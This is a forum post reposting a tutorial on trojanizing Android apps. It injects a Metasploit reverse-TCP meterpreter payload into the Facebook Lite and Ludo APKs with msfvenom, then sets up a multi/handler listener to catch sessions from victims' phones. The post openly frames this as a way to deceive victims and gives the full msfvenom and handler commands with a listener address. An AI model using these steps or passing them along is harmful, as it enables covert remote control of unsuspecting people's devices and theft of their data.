• We just launched and are currently in beta. Join us as we build and grow the community.

Perfectly Inject a Payload in an Original Facebook APK

VerdensS

Digital Workflow Architect
V Rep
0
0
0
Rep
0
V Vouches
0
0
0
Vouches
0
Posts
133
Likes
120
Bits
1 MONTH
1 1 MONTH OF SERVICE
LEVEL 1 400 XP
Grey-and-Neon-Green-Herb-Box-DIY-Collection-YouTube-Thumbnail-.png


Hey Folks, I think we are all familiar with the Metasploit framework and whenever a beginner makes their move in the h@cking field their first objective is to h@ck android smartphones but they are not satisfied with creating a simple backdoor so they try to inject malicious payloads into the well known application such as : WhatsApp, Instagram and Facebook to cheat the victim. But usually while doing this activity we face many types of errors, but in this article we will guide you the complete steps through which you can inject or embed any malicious payload in any known application.

Requirements

  • Kali Linux = 2020.1

Prerequisite

  • APKsigner or Jarsigner [One of them]
  • APK Tool [Latest]
  • ZipAlign

Lets take a look 🙂 !!

Relax 🙂 !! We will not try to cheat with you and even you can satisfy yourself by seeing the machine details in clear text. HaPpY 🙂 !!

3-13.png

ApkTool

Let’s go ahead and first we download all the dependencies or requirements that we must have to embed the payload in the original APK. Lets download the dependencies one by one and first we will download the leading tool called “apktool“. it will compile and decompile the apk files.

apt install apktool1apt install apktool

4-11.png

Zipalign

Zipalign is an archive tool that provides important optimization to Android application files but make sure it must only be performed before the APK file has been signed.

apt install zipalign1apt install zipalign

5-11.png

Jarsigner

JAR Signing and Verification Tool use to sign JAR files and time stamp the signature. But we have to install java in our machine to configure jarsigner. The command are given below, so just execute it on terminal.

apt-get install openjdk-11-jdk1apt-get install openjdk-11-jdk

6-10.png


In the following version of Kali Linux we use Java JDK 8 by default, but after executing the following command it will give us two options in which we have to select Java JDK 11.

update-alternatives --config java1update-alternatives--config java

7-10.png


After selecting it the jarsigner will automatically be configured on the terminal.

jarsigner1jarsigner

8-8.png


The configuration is complete and our first attempt is going to be awesome as we will try to inject the malicious Metasploit payload into a well-known Facebook Lite APK. First download the apk from here.

9-7.png


The method is very simple and as we use the command during payload creation, in the same command just we add the “-x” parameter to inject the payload into the original apk. Also you can see the result through the given image in which we have successfully injected the payload into the Facebook Lite application.

msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Facebook.apk1msfvenom-xfacebook-lite.apk-pandroid/meterpreter/reverse_tcp lhost=192.168.1.10lport=4444-oFacebook.apk

10-6.png


Now you can send your payload to the victims according to your own. But as you can see the payload will look like below after downloading.

11-7.png


Lets come back to the kali linux and start multi handler to kept the meterpreter session by using the following command.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
run123456msfconsoleuseexploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost192.168.1.10set lport4444run

12-7.png


Boom 🙂 !! As you can see that we got a meterpreter session after click the application by victim. Although we got success in payload injection. But take another application and try to inject payload into it. You can also download from here.

13-7.png


Now again we will follow the same steps that we followed above and try to inject the payload into the official Ludo application.

msfvenom -x com.azodus.ludo.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Ludo.apk1msfvenom-xcom.azodus.ludo.apk-pandroid/meterpreter/reverse_tcp lhost=192.168.1.10lport=4444-oLudo.apk

14-8.png


Swag 🙂 !! WOOOOOOO ! Again we got success to embed malicious payload into the original apk and also we have successfully get the meterpreter session again.

15-8.png
About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 

422,212

310,551

310,560

Top